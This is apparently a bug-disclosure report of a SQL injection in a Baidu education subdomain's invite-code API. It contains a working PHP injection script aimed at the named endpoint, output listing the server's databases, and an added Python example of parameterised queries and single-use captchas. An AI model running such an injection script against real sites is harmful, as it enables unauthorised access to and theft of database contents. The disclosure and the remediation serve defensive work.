SQL injection with root privileges on a Baidu second-level domain
The invitation-code input on https://jpaas-edu.baidu.com/ is vulnerable to SQL injection. There is a verification code, but it is not refreshed within a session and does not expire. A temporary script:
<?php
// The `sql` GET parameter is concatenated into the injectable invite_code field.
$querystring = "https://jpaas-edu.baidu.com/xplatfe/invite/api_use_invite_code?invite_code=123' or 1=(1=".$_GET['sql'].") limit 1--+&verify=7kpc";
// The same session id and verification code are reused on every request.
$cookie_jar = 'Cookie: sessionid=xxxxxxx';
$querystring = str_replace(' ', '%20', $querystring);
//print $querystring;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $querystring);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_COOKIE, $cookie_jar);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$result = curl_exec($ch);
curl_close($ch);
print $result;
?>

Database: mysql
Table: user
[6 entries]

available databases [6]:
[*] baidu_dba
[*] edu
[*] edu2
[*] information_schema
[*] mysql
[*] test
Solution: Filter the input.
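
The two weaknesses described above (the invite code concatenated into SQL, and a verification code that stays valid for the whole session) can both be closed on the server side. The following is an added example, not code from the original report or from the affected site: the function names, the `invites` table, the 120-second lifetime and the use of Python with SQLite are all assumptions made for illustration.

```python
import hmac
import sqlite3
import time

CAPTCHA_TTL = 120  # seconds; assumed lifetime, not taken from the report


def issue_captcha(session, answer, now=None):
    """Store the expected answer and its issue time in the server-side session."""
    session["captcha"] = (answer, time.time() if now is None else now)


def check_captcha(session, supplied, now=None):
    """Single-use check: the stored answer is discarded on every attempt."""
    stored = session.pop("captcha", None)  # consumed whether it matches or not
    if stored is None:
        return False
    answer, issued = stored
    now = time.time() if now is None else now
    if now - issued > CAPTCHA_TTL:
        return False  # expired
    return hmac.compare_digest(answer.lower().encode(), str(supplied).lower().encode())


def use_invite_code(db, session, invite_code, verify, now=None):
    """Return 'ok', 'bad_captcha' or 'bad_code' (hypothetical handler)."""
    if not check_captcha(session, verify, now):
        return "bad_captcha"
    # Placeholder binding: invite_code is passed as data and never becomes SQL text.
    cur = db.execute(
        "UPDATE invites SET used = 1 WHERE code = ? AND used = 0", (invite_code,)
    )
    db.commit()
    return "ok" if cur.rowcount == 1 else "bad_code"


def demo_db():
    """Constructed sample data: one unused invite code."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE invites (code TEXT PRIMARY KEY, used INTEGER DEFAULT 0)")
    db.execute("INSERT INTO invites (code) VALUES ('A1B2C3')")
    return db
```

Because the verification code is removed from the session on every attempt, a script cannot replay one solved value across many requests, and the bound parameter means a quote in the invite code is compared as a literal string.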